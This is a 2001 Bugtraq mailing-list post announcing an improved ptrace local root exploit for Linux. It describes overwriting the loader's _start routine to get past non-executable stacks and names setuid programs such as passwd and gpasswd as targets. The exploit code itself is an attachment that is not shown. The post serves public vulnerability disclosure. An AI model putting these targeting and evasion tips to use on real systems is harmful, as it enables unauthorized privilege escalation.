Subject: ptrace improvement
From: Tim Yardley <yardley@UIUC.EDU>
Reply-To: Tim Yardley <yardley@UIUC.EDU>
To: BUGTRAQ@SECURITYFOCUS.COM
Date: Sat, 31 Mar 2001 20:12:01 -0600
Message-ID: <5.0.2.1.2.20010331200447.02f6a048@students.uiuc.edu>

As always, there are always ways to improve things. This version of the
exploit posted here previously overwrites the dl _start routine and doesn't
modify eip. This will help on stack non-exec systems and doesn't require
you to calculate the bss offset. I didn't test it, but this should still
work on a stackguard compiled program as well.

Your mileage may vary, and this will still suffer from the disk cache issue
(speed becoming a paramount concern). The recent post by "Ihq", where his
exploit created a big file, is one way to fill out the cache so that the
suid binary is not in the cache. Manual methods are just as easy.

rsh, gpasswd, passwd, etc. are all common choices for hitting. Anything
will work.

More details lie within the code. Enjoy.

/tmy
[Attachment: epcs2.c (text/plain, base64-encoded; contents not included on this page)]
-- 
Diving into infinity my consciousness expands in inverse
proportion to my distance from singularity

Tim Yardley (yardley@uiuc.edu)
http://www.students.uiuc.edu/~yardley/